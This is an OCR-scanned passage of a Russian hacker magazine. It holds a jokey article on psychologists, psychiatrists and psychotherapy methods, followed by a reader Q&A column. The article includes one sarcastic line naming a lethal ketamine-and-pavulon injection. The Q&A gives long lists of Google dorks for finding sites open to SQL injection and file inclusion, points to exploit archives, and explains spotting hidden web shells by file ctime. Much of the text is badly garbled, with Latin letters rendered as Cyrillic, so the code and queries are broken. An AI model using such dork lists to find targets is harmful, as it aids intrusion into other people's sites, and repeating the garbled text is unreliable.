рублей. -г 
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ІЛЧІТ5 



Александр Лозовский ІогоѵгкуШдатеІапсі.ги 



РЗУСНО: 

ПРОФЕССИОНАЛЫ ЧЕЛОВЕЧЕСКИХ ДУШ 

Психологические техники на службе 
светлой стороны силы 

Так сложилось, что последние полгода мы освещали преимуще- 
ственнотемную сторону пси -силы — безумства, легкие помеша- 
тельства, обманы и манипуляции. Получается, мы совершенно 
незаслуженно обошли своим вниманием относительно добрых 
юнитов — психологов, психиатров, тренеров — ите психотехники, 
которые они в рамках своей деятельности реализуют. 



есправедливо? Сегодня мы попро- 
буем это упущение компенсировать. 
Вначале давай рассмотрим, что все 
эти боевые единицы собой представ- 
ляют, чем характеризуются и как друг 
отдруга отличаются, а затем плавно перейдем к 
описаниютехспособов воздействия на челове- 
ческие души, которые они практикуют. 

Психологи 

Название специальности недвусмысленно 
намекает на принадлежность к когорте из- 
бранныхзнатоков человеческихдуш — что, 
якобы, и является профессией психологов. 
Научные определения «психологии» как науки 
и «психологов» какспециалистов мы здесь 
приводить не будем — итакясно, что первое — 
академически-прикладная наука, изучающая 
структуру человеческой психики, поведение и 
мотивацию человеков разумных, но вот второе... 
со вторым нетакясно. Кто они, чем знамениты, 
чем занимаются, а чем нет? Ну, во-первых, 
психолог получается методом горячего литья в 
течение пяти летобучения в соответствующем 
вузе/факультете. Благодаря тому, что наша стра- 
на — велика и могуча, а законы в ней — строги 
и не обязательны, психологи ранее отливались 
и альтернативными способами. Покупкой 
дипломов, курсами повышения квалификации 
или просто любыми другими курсами, нередко 
проводимыми в кабинетах труда соответствую- 
щими преподавателями (которые до этого учили 
детей обрабатыватьдрачовым напильником 
детали номер восемь). Таких личностей и сейчас 
остается не менее половины, что, очевидно, 
сказывается на их среднем профессиональном 
уровне. Не будем о грустном, а лучше посмотрим, 
что входит в задачи психологов. 

1. Психологическое консультирование. Ясное 



дело, что проводится онолибо позапросу самой 
личности, либо позапросу компетентных органи- 
заций вроде: 

• Образовательныхучреждений (чтобы понять, 
действительно ли данный подросток— приду- 
рок, или только прикидывается, в чем заключа- 
ется его проблема, и как можно скорректировать 
его воспитание/образование, исходя из этой 
информации). В большинстве отечественных 
школ основными способами реагирования на 
особенности психологии учеников является «иг- 
норирование», «отчисление», «третирование», 
«пускание на самотек» и многие другие. Поэтому, 
какты понимаешь, без психолога в нихочень 
хорошо обходятся. 

• Красной армии (подойдетли юнитдля ответ- 
ственной должности, можно ли спрогнозировать 
его поведение в такой-то ситуации, сможетли 
эта группа юнитов в течение года работать на 
одной подлодке, уживутся ли они друге другом, 
не перережутли другдруга и прочее). Например, 
всем известно, что Джины ненавидят Ифритов, а 
Архангелы — Архидьяволов. Психологи подходят 
к этому делу более научно. 

• Различных капиталистическихучреждений. 
Сейчас, в XXI веке, нет никаких сомнений, что 
машина капитализма нетолько пьет кровь 
рабочих (она ей смазывается :)), но и покушается 
на самое святое — их душу. Многие корпорации 
принимают на работу новых офисных троллей 
только через собеседование с начальником 



соответствующего подразделения и психоло- 
гом — специалистом по подбору персонала. 
Считается, что такой подход помогает подобрать 
более слаженный коллектив, нанимать более 
профессионально-ориентированных сотрудни- 
ков, повысить их лояльность компании и снизить 
текучку кадров. Сточки зрения работодателя все 
выглядит довольно радужно, с позиции же соис- 
кателя должности — наоборот; возникает мно- 
жество вопросов этического («почему я должен 
позволять кому-то ковыряться в моей голове») и 
правового плана (за подробностями обращайся 
к 70-й статье трудового кодекса: «Испытание при 
приеме на работу»), 

2. Психодиагностика. Нет, это не диагностика 
душевных болезней, а особая, психологическая 
магия — оценка психологической сферы челове- 
ка (внимание, восприятие, память, интеллект...) с 
помощью формализованных (например, навер- 
няка известные тебе тесты и опросники Люшера, 
Роршаха, ММРІ) и неформализованных методик, 
вроде наблюдения, диагностической беседы 
или анализа продуктов деятельности консульти- 
руемого. Помнишь канонические случаи, когда 
психолог рассматривает какой-нибудь рисунок 
домика и в итоге заключает, что, поскольку труба 
удомика маленькая, то автор рисунка наверняка 
подсознательно недоволен длиной своего фал- 
лоса? Воттебе пример использования слабо- 
формализованной методики, да еще и в отрыве 
от общей картины. В результате — полный бред 



Психология и литература 

Достоверно неизвестно, по какой причине психологи, формально знающие толк в челове- 
ческом умище, настолько криво и заумно формулируют свои мысли, что их книги (в Вики- 
педии — и в той без поллитры не разберешься) становится положительно невозможно 
читать. Тем не менее, я тебе их посоветую. Страдай! 
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БСѢМП ЛЮБИМЪ. 

Шлю свою фотограф, кар- 
точку въ знакъ своего спа- 
сенія отъ онанизма, кото- 
рымъ я страдалъ 18 лѣтъ. 
Много я потратилъ силъ, 
никогда не быль веселъ, все 
что-то меня тяготило, а сей- 
час . у меня появилась ве- 
селость. Я былъ стыдливъ 
съ женщинами, былъ недо- 
воленъ собой, а теперь принимаю участіе въ 
какомъ угодно обществѣ и всѣми любимъ. 
(“ТО разъ спасибо за вашъ цѣлебный препа- 
ратъ «Біолъ-Ласлей». Т. М. Н. 

Если Вы страдаете общею и половой сла- 
(•осіыо, головными болями, безсонницею, 
малокровіемъ, онанизмомъ и его послѣд- 
ствіями, робостью, слабой памятью, 
послѣдствіями венерич. бол., если Вы нер- 
вны, раздражительны, переутомлены — 
спросите въ аптекѣ коробку „Біола", но 
только настоящаго «Біола-Ласлей* *. Вы по- 
лучите блестящіе результаты. Это извѣст- 
ное средство противъ неврастеніи, которое 
совершенно безвредно. За справками мож- 
но обращаться въ С.-Петерб., отд. 7 части 

ИОЧТОВ. ЯЩ. ^ 371. 83222 

Классический клиентпсихотерапевта. Вте времена 
ихеще не было, поэтому пациент излечился неким 
токсическим снадобьем, возможно, даже плацебо 




со стороны анализирующего. 

3. Психокоррекция. Жестокое 
слово «психокоррекция», так 
ассоциирующееся в нашихстобой 
измененных интернетом мозгах с 
электросудорожным воздействием, 
сывороткой покорности и формати- 
рованием личности с использова- 
нием пожизненного цика с гвоздя- 
ми, на деле оказывается довольно 
спокойным явлением. Причинтому 
несколько: 

• по нашим законам психологне 
имеетправа назначать никакие 
лекарственные средства. С учетом 
вышеизложенной суровой правды 
о среднем уровне отечественного 
психолога, который выучился на 



свою специальность путем про- 
хождения двухмесячных курсов, 
согласись, это нетакужи плохо; 

• электросудорожную и инсулино- 
коматозную терапию они тоже, к 
счастью, назначать права не имеют; 

• как ни парадоксально, но 
психотерапией по отечественным 
законам... психологтоже не имеет 
права заниматься. Отличненько, 
воттакпсихолог — специалист 
по человеческим душам, который 
не имеетправа ни на что, кроме 
ведения непонятных разговоров и 
анализа результатов непонятных 
тестов? Нуда ладно, не касаясь 
тонкостей наших строгих, но не 
обязательныхзаконов, постараюсь 




объяснить тебе суть психокоррек- 
ции. Направлена она нато, чтобы 
повысить социальную адаптацию 
человека, скорректировать осо- 
бенности, выходящие за рамки 
общепринятых, или усилить те 
качества, которые, на взгляд об- 
ратившегося к психологу чувака, у 
него развиты недостаточно (вни- 
мание, память, общение]. Иначе 
говоря, перец, желающий моди- 
фицироватьсвой поведенческий, 
не побоюсь этого слова, стереотип 
и усилить какие-либо социальные 
навыки, отправляется прямиком к 
психологу, который и промоет ему 
мозгиндивидуальным (психологѣ 
клиент] или групповым методом 
(да-да, свальный грех: психологѣ 
группа клиентов, одержимых од- 
ним и тем же вопросом]. О конкрет- 
ныхтехниках, которые при этом 
используются, мы поговорим чуть 
ниже. Все, психолога мы стобой 
более-менее разобрали, осталась 
одна малость на закуску — 
ответить на вопрос, который мучил 
тебя долгие годы, но ответ на 
который ты узнаешьтолько сейчас 
:]. Начнем издалека. В связи с 
огромным количеством (весьма 
левоватых] вузов, обещающих под- 
готовку на психолога, вероятность 
того, что ты лично илитвои друзья 
имели честь интимно встречаться с 
девушкой -студенткой соответству- 
ющего направления, очень высока. 
Очень высока также и вероятность 
былинного отказа этих отношений, 



Буква закона: психиатрическое 
освидетельствование — дело добровольное 

Психиатрическое освидетельствование проводится для определения: страдает ли обследуемый 
психическим расстройством, нуждается ли он в психиатрической помощи, а также для решения 
вопроса о виде такой помощи. Психиатрическое освидетельствование, профилактические осмотры 
проводятся по просьбе или с согласия обследуемого («Закон о психиатрической помощи и гаран- 
тиях прав граждан при ее оказании», статья 23]. Исключения есть, но они касаются явно опасных 
для себя или для общества личностей (загугли полный текст статей 23 и 24, если интересны под- 
робности). 




Зигмунд Фрейд ака 
СиГИЗМуНД ШЛОМО: 
главный психоаналитик 
страдиционной 
сигарой. Нет р ты не 
можешь смешно 
пошутить по поводу ее 
фаллической формы: 
всеуже было сделано 
до нас 



сопровождавшихся тотальным 
выносом мозга мучачоса. «В чем 
причина? — наверняка спрашивал 
себя означенный мачо. — Как, 
почему? Как представитель та кой 
профильной специальности может 
быть та ким ужасно сумасшед- 
шим?». Секрет прост — массовый 
приход (хе-хе] акцентуирован- 
ныхличностей и невротичек- 
манипуляторш в психологи явля- 
ется следствием того, что человек, 
сознательно или подсознательно 
осознавая свою «ущербность», 
пытается в ней разобраться. 

Читает книжки, собирает отзывы, 
идетучиться. И что получается? 
Ничего не получается, поскольку, 
как мы стобой уже говорили в 
предыдущих статьях, изменить 
себя чтением книгили обучением 
на психфаке, невозможно. Именно 
поэтому в развитых странах работа 
психологом невозможна, если 
означенный специалистне на- 
ходится под наблюдением другого 
пси-специалиста — супервайзера. 
Иначе говоря, хочешь вправлять 
мозги окружающим — приведи 
сначала в порядоксобственные. 
Надо ли говорить, что в нашей 
стра н е та ко й п одход н е п ол ьзуется 
популярностью? :] 

Корпоративный 
тренер, он же коуч, 
он же бизнес- 
консультант 

Корпоративный «психолог», за- 
нимающийся подбором нового 
офисного планктона, мотивацией и 
тренингами персонала существую- 
щего, в первую очередьзнаменит 
тем, что совершенно необязательно 
бывает психологом. Науке известны 
тренеры-преподаватели, тренеры- 
бизнесмены и даже воины- 
интернационалисты, бывшие 
военные преступники :). Для нашей 
статьи этоттипажне имеет особой 
ценности по ряду причин: 
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Линда Гамильтон ѵз. Сара Коннор. Наш идеал жертвы карательной психиатрии в США! 



• К«добрым» пси-специалистам он относится 
чисто условно. 

• К пси-специалистам он часто и вовсе не от- 
носится (если, конечно, полторы прочитанные 
книжки с названием «Подготовка успешного со- 
трудника: 100 игр, направленных на сплочение 
команды» можно отнести кобразованию]. 

• Корпоративная мотивация, отбор персонала 
и зомбирование, — всеэти темы мы надеемся 
вынести в отдельную статью :). 

Психиатр 

Врач-психиатр — в первую очередь, врач, и 
только во вторую — пси-специалист. Подготав- 
ливается данная боевая единица в медицинских 
институтах и соответствующих (медицинских] 
факультетахуниверситетов. Причем первые 6 лет 
будущий психиатр изучает исключительно обще- 
врачебную программу (со всеми ее физиками, 
пятью разными химиями и работой в покойниц- 
кой]. И только затем, в течение 2-х лет орди- 
натуры по психиатрии, постигает собственно 
предмет, из-за чего вышеописанные безумные 
девушки с горящими глазами в психиатрию 
попадают редко. Психиатр имеет право на все, 
не влезая, впрочем, в психологическую епархию 
вроде хитрыхтестов и мощных 600-вопросных 
опросников (в дурдомах даже есть отдельные 
ставки медицинских психологов], а именно, на: 

• лечение всех психических заболеваний, от 
«малой» психиатрии (депрессии, неврозы] 
до «большой» вроде шизофрении (психологи 
лечить не могутвообще ничего); 

• применениефармакологическихсредств вро- 
де антидепрессантов и нейролептиков; 

• применениедругих способов, вроде твоей 
любимой ЭСТ(что, кстати, благодаря наркозу, 
садистским методом не является и влечении, на- 
пример, депрессии, вполне себе применяется]; 

• неофициальное ведение психотерапии —то 
есть, «лечения разговорами» — как«настоящих 
болезней» вроде депрессии (где разговоры 
подкрепляются лечебными колесами], так и 
«всякой фигни» вроде«неумеюзнакомиться 

с женщинами/мужчинами, а потом меня все 
равно все бросают», «нет детей и не знаю, что 



с этим делать — жаловаться или хвастаться», 

«у меня низкая самооценка» и т.п. Конечно 
же, научно «всякая фигня» всякой фигней не 
называется (и вообще-то ей и не является], а 
называется она «помощью в избавлении от 
личностных и социальных проблем». Дело 
хорошее, людям нравится. Правда, во время 
обучения психиатрии нетакмного времени 
отводится на ознакомление со всем этим 
шаманством, поэтому сертификат и гордое 
звание «психотерапевт» только после обучения 
психиатрии пока не выдают. 

Более подробно о психотерапии мы стобой 
поговорим чуть ниже — в конце концов, ведь 
именно она представляет собой наиболее яркий 
пример психотронного воздействия сдоброй 
стороны силы. 

Психотерапевт 

Хитрый специалист, который занимается вроде 
какие психологией и не психиатрией, но явля- 
ется при этом, как ни странно, психиатром или 
психологом (законы разных стран по этому по- 
воду сильно разнятся]. Он зомбирует (вру, лечит] 
людей, делая это по-хорошему — с ихявного, 
информированного согласия и послезаключе- 
ния контракта (нутам, чего хочешь достичь, что 
для этого готов сделать, сколько кому отслюня- 
вить, и каковы будутусловия прекращения этого 
контракта). Осознал теперь, чем хорошие парни 
отличаются от плохих? Хорошие — взимают 
бабло (или другие ништяки] в явном виде. Все 
условия оговариваюттакже явно, и в процессе 
общения с нимиучеловека не возникает дис- 
комфорта («почему я с ним занимаюсь, чем я 
с ним занимаюсь, что я за это буду должен, не 
станетли мне хуже, делают ли мнетутодолжение, 
не попаду ли я потом в анальное рабство»], а же- 
лаемый эффектоговаривается заранее. Плохие 
парни — манипуляторы, обманщики, психи, ре- 
шающие свои эмоциональные проблемы за счет 
консультируемого — поступают строго наоборот. 
Но не будем увлекаться. Итак, психотерапевти- 
ческие методики: 

• Психоанализ. Древнее, спорное и широко 
известное направление психотерапии. Бла- 



годаря злобному сексуально озабоченному 
Зигмунду Фрейду, который сформулировал 
систему идей по структуре человеческой 
психики, состоящей из сознательного и под- 
сознательного и делящейся на «ИД», «ЭГО» 
и «СУПЕР-ЭГО», эта методика закрепилась 
в умах. Настолько мощно, что большая часть 
психологии в целом в глазах обывателя стала 
ассоциироваться с психоанализом. Открой 
любой популярный журнал, в котором какого- 
нибудь психолога просят что-либо объяснить. 
Какой это будет делать? Очень просто! «Вам 
снился самолет? Самолет — это член! Падает 
в лес? А в лесу у нас что? Сосны? А сосны — 
это что у настакое?Такое длинное, гладкое, 
стоящее? Да это же тоже член, батенька! 
Отгадка проста — вы подсознательный содо- 
мит. Пройдите психоанализ. Вероятно, ваше 
развитие зациклилось на анальной стадии». 
Практически все, что тебе нужно знать о 
психоанализе, это как раз вышеупомянутые 
стадии психосексуального развития (ораль- 
ная, анальная, фаллическая, генитальная], 
о которых мы подробно говорить не будем, 
поскольку ты всегда можешь их загуглить. В 
результате прохождения этих стадий форми- 
руется структура психики, которая похожа на 
дом с подвалом, жилым помещением и кры- 
шей. Здесь есть ИД (пользуясь случаем, хочу 
передать привет Ю ЗоІФл/аге, я вас люблю!], — 
глубокое подсознание, мрачный подвал 
нашей психики, в котором теснятся злобные 
идеи, обещающие «удовольствия»: пожрать, 
отнять, убить, поиметь и опять-таки съесть. 
Есть ЭГО — «Я», которое все это дело сверху 
контролирует. Есть СУПЕР-ЭГО — система 
общественных ценностей и ограничений, 
которые бедное ИД еще более мощно ограни- 
чивают. Вот, собственно, и все. Разумеется, 
по психоанализу написаны толстые книжки, 
на его тему ведутся баталии, а специали- 
сты имеют по его поводу разные мнения, от 
«забудьте эту сексуальную бредятину, плод 
воспаленного воображения» до «а что, это 
круто, это работает. Учитесь лучше!». В кон- 
тексте психотерапии психоанализ отличается 
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Когнитивная психотерапия: полное руководство. Не 
для среднихумов! 




Справочникпо 
психиатрии от 
издательства 
«Практика» (в .рсіЬ). 
Кратко, просто, понятно. 
Удивительное дело :) 




Гугл рекомендует: стань психологом: курсы, 
недорого, ѴІР, на дому, сауна, выезд, апартаменты, 
100% контроль окружающих! :) 



следующими чертами: 

1. Длительностью. Можно всю 
жизнь проваляться на кушетке 
психоаналитика. Анекдот про мо- 
лодого специалиста, вылечившего 
пациента, которого его отец не мог 
вылечить всюжизнь, при этом ку- 
пив на деньги клиента дом, машину 
и образованиесына, какраз про 
психоаналитика. 

2 . «Мутно ватостью» подхода, 
который, собственно, является сла- 
боформализуемым — интерпрета- 
ция (собственно анализ, «пролитие 
света» натемные стороны психики], 
анализ сновидений (пример — 
выше], ассоциаций (огурец- 
зеленый-член-... ой!], ошибок, 
описоки оговорок. 

3. Дороговизной, «элитарностью». 
Клиентов у психоаналитика немно- 
го, все наблюдаются годами, и злой 
буржуин всегда может похвастаться, 
что он посещаетпсихоаналитика :). 

4 . Недоумением, которое, возможно, 
испытает клиент, узнав, что анализ 
окончен — сразу послетого, как 
его порадовали новостью, что он 
жаждет заменить собственного 
отца в постели собственной матери 
(Эдипов комплекс]. 

5 . Бедностью фантазии в смысле 
первопричин всех расстройств. Что 
у нас тут есть? Эдип и Электра как 
эталоны посягательства на интим 

с родителями, зависть к пенисуу 
женщин и некоторое количество 
разныхфиксаций с интригующими 
названиямитипа «анальная» или 
«оральная». 

• Когнитивная психотерапия. Этот 
тип легального воздействия мозгом 
терапевта на мозг подопытного 
клиента отличается от психоа- 
нализа тем, что не ставитсвоей 



задачей проникнуть в глубины 
(под)сознания пациента, а всего- 
навсего стремится нормализовать 
его пониманиедействительности. 
Для тебя же не секрет, что в разных 
условиях, в разное время и в разных 
ситуациях мы по-разному смотрим 
на одинаковые вещи, по-разному 
истолковываем свои и чужие 
поступки? Например, человек, 
смотрящий на мир сквозь черную 
призму депрессии (или просто 
криво, подругой причине] может 
сделать неправильный вывод из 
одного (спорного] факта, проигно- 
рировать сотню других, достовер- 
ных, фактов, выстроив в результате 
неправильную линию поведения и 
пострадав в социальном плане. На 
этом и основана когнитивная пси- 
хотерапия — в процессе лечебной 
беседы, задавая «правильные» 
вопросы, психотерапевт помогает 
(если он не совсем деревянный] 
подопытному привести свои мысли 
в порядок, соотнеся причины со 
следствиями, а аргументы — с 
фактами. Как видишь, никакого 
внушения, мозгокопания и гипноза 
:] —такие психотерапевты не дают 
никаких советов. 

Поэтому, если кто-то начинает 
переносить на кого-то свой личный 
опыт вроде «да брось ее, она стерва, 
найдешь другую» ил и там «ты же 
неудачник, сделай себе кетамина с 
павулоном по вене, не копти небо, 
умрешь быстро и безболезненно» — 
знай, это не психотерапевт, это ба- 
бушка на завалинке, ТП в интернете 
или просто вредитель. 

• Экзистенциальная психотера- 
пия. Еще один вид психотерапии, 
направленный не на изучение и 
анализ психики человека, а на 



изучении его жизни (втом числе, 
тех переломных моментов, которые 
позволяютее круто изменить] — в 
связи с окружающим его миром и 
сожительствующими с ним людьми. 
Направлений экзистенциальной 
психотерапии несколько, одного 
из ее основоположников мы уже 
упоминали в рамках Р5УСН0 — это 
Ирвин Ялом. Качай его книги, если, 
конечно, не боишься :]. 

• Психодрама. Никаким император- 
ским театром драмы и комедии тут 

и не пахнет, да и особым трагиз- 
мом все это дело не отличается. 
Психодрама — это такое шоу, когда 
постановщик (режиссер) — это один 
из клиентов, а «роли» действующих 
лицпроблемной ситуации исполня- 
ют другие члены терапевтической 
группы. В задачи психотерапевта 
вход ит тол ько удерживать эту кон- 
струкцию, то есть помогать инструк- 
циями, задаватьхитрые вопросы 
«действующим лицам» и самому 
«режиссеру». Обмен мыслями и 
чувствами может происходить и в 
процессе разыгрывания сценки. 

• Семейная психотерапия. Из 
названия нетрудно до га даться, 
что когда жена пьет, муж сидит за 
компом, дети — дерутся, школу 
прогуливают и плохо кушают, а 
суммарно все плюют друг на друга с 
высокой колокольни — поможет им 
только... нет, неживительный на- 
палм. Гуманнее надо быть, товарищ! 
У нас ведьдобрая статья. Поможет 
им семейная психотерапия, которая 
изобретена, дабы работать не с 
одним человеком, а со всей семьей 
разом. 

• Гипноз и Эриксоновский гипноз. 
По сути, это не отдельные направ- 
ления, а инструменты, применяе- 



мые в рамках психотерапии. Ты 
же пользуешься гаечным ключом 
в процессезамены разбитого в 
новый год унитаза? Вот и психо- 
терапевты пользуются гипнозом в 
разных видах психотерапии — ино- 
гда клиентам хочется испытывать 
поменьше боли итерапевтпони- 
мает, что его можно от части боли 
избавить. Ничего лучше, чемтранс, 
для проживания неприятныхжиз- 
ненных моментов, мозгчеловека 
пока не придумал. Кстати, транс — 
дело обыкновенное, ловлей ворон 
на скучныхурокахастрофизики 
хоть раз занимался каждый нор- 
мальныйученик. Переживая, втом 
числе, и первые состояния легкого 
транса. С помощью гипноза, если 
это полезно и безопасно для 
пациента, терапевт впаривает 
капризному мозгу клиента ту самую 
астрофизику, когда она ему нужна, 
при этом позволяя думать, что 
клиентсчитает ворон... Разница 
между видами гипноза не велика, 
обычно она чисто техническая. 
Милтон Эриксон никогда не орал 
клиентам «СПААААТЬ!», как это 
делали и делают«классические» 
гипнотизеры и фокусники. Однако 
его клиенты также радостно «счи- 
тали ворон». 

Заключение 

Будем считать, что после про- 
чтения этой статьи ты немного 
продвинулся в осознании смысла 
жизни и существования легальных 
специалистов по человеческим 
душам. Теперь, если ты вдруг 
сойдешьсума по-настоящему на 
почве ностальгии потекстам Дани 
Шеповалова — будешь знать, куда 
обращаться :]. Удачи, тг 
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УЫІТЗ 



Степан «Зіер» Ильин ІѵѵіМег.сот/зіераЬ 



ы 

■ (аігеаі.хакер.ги 

иітесі 





Есть вопросы, в чем-то не смог разобраться? 
Хочешь увидеть ответ на свой вопрос в люби- 
мом журнале? Наш ящик іаяГагеаІ.хакер.ги 
ждет твоих писем! 

Автор самого интересного вопроса следую- 
щего номера получит подарок: 46 ІіБВ-мо- 
дем Батзипд 5^0-1)200 для работы в МоЬіІе 
ШіМАХ сети УОТА. 



0: Обожаю копаться в коде различных движков. 
Какие СМ5 наиболее популярны в Сети? 

А: Сейчас существуют сотни, если не тысячи, 
более или менее популярных веб-движков, 
каждый из которых широко известен толь- 
ко в какой-либо стране или сегменте Сети. 
Поэтому я не возьмусь сам составлять та кой топ 
(любой топ по наиболее используемым СМ3 
будет крайне субъективным), а воспользуюсь 
уже готовым мнением специалистов портала 
іиізріиг.сот . 

1. ѴѴогсІРгезз — твердое первое место 
[ ѵѵогсіргезг.огд ; 1 1 6,000,000 результатов в Гугле 
по запросу «роѵѵегеб Ьу ѵѵогсІргезз»]; 

2. Огираі — не менее популярный движок, 
используемый небезызвестным ѵѵЫіебоизе.доѵ 
[ сігираі.сот : получить примерное представ- 
ление о количестве установленных движков 
можно в Гугле по запросам «іпигІ:посІе/І\І», где 
N — любое число); 

3. Ооотіа! — наиболее любимый хакерами дви- 
жок (|ооггііающ; 22,000,000 результатов в Гугле); 

4 . ЕхргеззіопЕпдіпе — темная лошадка втопе, 
распространяется на платной основе и почти 
не используется в странах СНГ 



[ ѵѵѵѵѵѵ.ехргеззіопепдіпе.сопп ; 3,530,000 резуль- 
татов); 

5 . ТехіРаМегп — также довольно известный дви- 
жок [ іехіраНегп.сот : по разным запросам Гугл 
выдает до 500к результатов); 

6 . Расііапі СМ3 — простая, но очень мощная 
СМ3 [ гасІіапЩтз.огд ; до 400к результатов); 

7 . Сизбу СМ3 — крайне интересная разработка, 
работающая с чистым НТМЕ и нетребующая 
никакого интерпретируемого языка на сервере 
[ ѵѵѵѵѵѵ.сизЬѵстз.сопп : более 200к результатов); 

8 . ЗіІѵегЗітіре — движок, чем-то напоминающий 
ѴѴогсІРгезз [ ѵѵѵѵѵѵ.зііѵегзігіре.огд ; более 1 60к 
результатов); 

9 . АІігезсо — мощный движок на ЗЗР [ ѵѵѵѵѵѵ. 
аИтезсо.сот ; более 1 00к результатов по разным 
запросам); 

10. ТѴРОІідЫ: — широко известный в СНГ дви- 
жок [ ѵѵѵѵѵѵ.ІѵроІідІіГогд ; до 1 00к результатов по 
разным запросам). 

Естественно, искать уязвимости в первыхтрех 
СМ3 изданного топа — занятие довольно бес- 
полезное (если нетрогать модули и плагины), 
зато остальные движки радостно предоставят 



тебе свои исходники для дальнейшего их пре- 
парирования :). 

РЗ.Также советую обратить внимание на 
сборники менее популярных движков: рбр. 
орепзоигсестз.сот . спг ізі , :тзтаІгіх. 
от и на известнейшее Ореп Зоигсе комьюнити 

зоигсеіюгде.пеГ 

О: Пишу свой движок. Встала проблема с сов- 
местным использованием библиотек іОиегу и 
Ргоіоіуре. Как разрешить их конфликт? 

А: Как раз на такой случай в замечательном 
фреймворке)Оиегу предусмотрена фича 
посопШсі-тосІе. Использовать ее можно, 
например, так: 

<Ьеас 1 > 

<зсгірС згс= "ргоСоСуре . з з " ></ 
зсгірС> 

<зсгірС згс= " здиегу .33" ></зсгірС> 
<зсгірр> 

ЗОиегу . поСопОісС ( ) ; 
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/ / ІІзе з Оиегу ѵіа з Оиегу (...) 
зОиегу (боситепб ) . 
геасіу ( іипсбіоп ( ) { 

зОиегу ( " біѵ" ) .Ыйе ( ) ; 

}) ; 

// ІІзе Ргобобуре члібИ $(...), 
ебс . 

$ ( ' зотеісі ' ) . Ъйбе ( ) ; 

</зсгірб> 

</Ьеас1> 

<Ъос1у></Ъос1у> 

</Ьбт1> 

Подробности и другие примеры использования 
ищи на официальном сайте]Оиегѵ — Мир:// 
сІосзддиегѵ.сопп/Цзіпд ]0иегѵ ѵѵііЬ ОіЬег 
ЫЬгагіез . 

0: Существуютли в настоящее время ресур- 
сы — сборники свежих эксплоитов, подобные 
почившему тіІѵѵОгт.сот? 

А: По мнению большинства участников фору- 
мов по безопасности, именно ресурс ехріо.іі; 
(или ѵѵѵѵѵѵ.ехрІоіІ-бЬ.сопп ) является преемником 
внезапно покинувшего нас милворма. Здесь, 
каки на тіІѵѵОгпп.сот .ты сможешь найти 
разделы: 

• Петоіе Ехріоііз (удаленные эксплоиты); 

• І_осаІ Ехріоііз (локальные эксплоиты); 

• ѴѴеЬ Арріісабопз (эксплойты для веб-прило- 
жений); 

• ОоЗ/РоС (эксплойты для атак отказа в обслу- 
живании); 

• ЗЬеІІсосІе (шелл-коды); 

• Рарегз (статьи); 

• ЗеагсЬ (поиск); 

• О (скачивание всех эксплойтов в одном 
архиве); 

• ЗиЬппіІ (добавление своего эксплоита); 

• Рзз (подписка на обновления базы данных 
эксплоитов). 

Также советую не забывать про наших старых 
знакомых: зесигіЫосиз.сот и зесигібЛаЬ.ги . 

0: Подскажи примеры запросов для Гугла, по 
которым можно искать уязвимые сайты. 

А: Легко! Вот небольшой список дорков (богкз), 
разделенный на категории: 

1 . ЗОЬ-инъекции: 



іпигі : 


" . рЪр?іс1= " 


іпигі : 


" .рЬр?саб= " 


іпигі : 


" .р]гр?сабісІ= 


іпигі : 


" . р1ір?пит=" 


іпигі : 


" .рЬ.р?ЪісІ= " 


іпигі : 


" . рЬр?ріб= " 


іпигі : 


" . рЬр?піб= " 


іпигі : 


" . рЬр?аѵб= " 


іпигі : 


" .рЬр?бі1е= " 



2. Еосаі Еііе Іпсііізіоп/Ветоію Еііе Іпсіизіоп: 

іпигі : " . рЪр?радіпа=" 



іпигі 


" .рИр?іпс=" 


іпигі 


" . рПр?іпс1и(іе_іі1е= " 


іпигі 


" . рЬр?раде=" 


іпигі 


" . рЬр?збючл=" 


іпигі 


" . рЬр?саб= " 


іпигі 


" . р!ір?бі1е=" 


іпигі 


" . рИр?раб1і_1оса1 = " 


іпигі 


" . рИр?ркрЪЪ_гооб_с1іг= 


іпигі 


" . р!ір?раб1і_рге= " 


іпигі 


" . рИр?піс= " 


іпигі 


" . рИр?зес= " 


іпигі 


" . рИр?сопбепб= " 


іпигі 


" . рИр?1іпк=" 


іпигі 


" . ркр?бі1епате=" 


іпигі 


" .рПр?біг=" 


іпигі 


" . ркр?с1оситепб = " 


іпигі 


" . ркр?ѵіеѵ\г=" 


іпигі 


" . ркр?зе1= " 


іпигі 


" . ркр?1осабе=" 


іпигі 


" . ркр?р1асе= " 


іпигі 


" . ркр?1ауоиб= " 


іпигі 


" . ркр?до= " 


іпигі 


" . ркр?сабсЪ= " 


іпигі 


" .рПр?тобе=" 


іпигі 


" . ркр?пате=" 


іпигі 


" . ркр?1ос=" 


іпигі 


" . ркр?б=" 


іпигі 


" . ркр?іпб=" 


іпигі 


" . ркр?рд= " 


іпигі 


" . ркр?1оас1=" 


іпигі 


" . ркр?паат=" 



Таких примеров можно привести бесконечно 
много, стоит лишь подключить свое воображе- 
ние :). 

0: Слышал, что в *піх-системах можно очень лег- 
ко найти файлы, измененные командой ІоисІі. 
Как это сделать? 

А: Действительно, команда ІоисЬ изменяет 
лишь время модификации файла (гтПіте) и 
время доступа на то, что было указано в ее 
параметрах. Те, кто пользуются командой 
ІоисЬ для сокрытия своих шеллов от назой- 
ливых глаз админов взломанного ресурса, 
часто забывают, что у файла также есть и 
такой забавный атрибут, как сЛте (СНапде 
Тіте) — он фиксирует время изменения 
метаданных файла (например, правдоступа, 
владельца, группы и т.д.). Таким образом, для 
поиска свежезалитых и спрятанных шеллов 
админу поха канн ого сайта достаточно лишь 
воспользоваться утилитой ГіпсІ следующим 
образом: 

"біпб [КАТАЛОГ] -сбіте -1". 

Стоит отметить, что менять атрибут можно 
лишь с правами рута. Для этого существуют 
специальные средства: ѵѵѵѵѵѵ.кга2ѵѵѵогк5. 
сот/сЬапдіпд-Ьте и ѵѵѵѵѵѵ.зесигТеапп.сот/ 
ІооІз/5ЦР0Н2К7ЕЕ.Ы:т[ . 

Р5. Спасибоза информациюучастникуАнтичата 
(От). 



0: Какие еще возможности существуют у систе- 
мы ѴѴеЬМопеу, помимо операций с валютой? 

А:ѴѴеЬМопеу располагает множеством инте- 
ресныхсервисов. Среди наиболее полезных в 
нашем деле следует отметить: 

1. Передача файлов. ѴѴеЬМопеу создала спе- 
циальный файлообменник, расположенный по 
адресу Ыез.уѵеЬтопеѵ. ги . С помощью сервиса 
ты сможешь не просто обмениваться файлами, 
но еще и проводить защищенные сделки с 
другими участниками системы — файлообмен- 
никлогируетвсе следы передачи файлов в 
системе. 

2. Передача игровой валюты — специальный 
сервисдля геймеров, позволяющий прода- 
вать, покупать и обменивать внутриигровую 
валюту, персов, артефакты и другие предметы, 
присутствующие в популярных многопользова- 
тельских онлайн -играх. Найти сервис можно по 
адресу датеіоі.ги . 

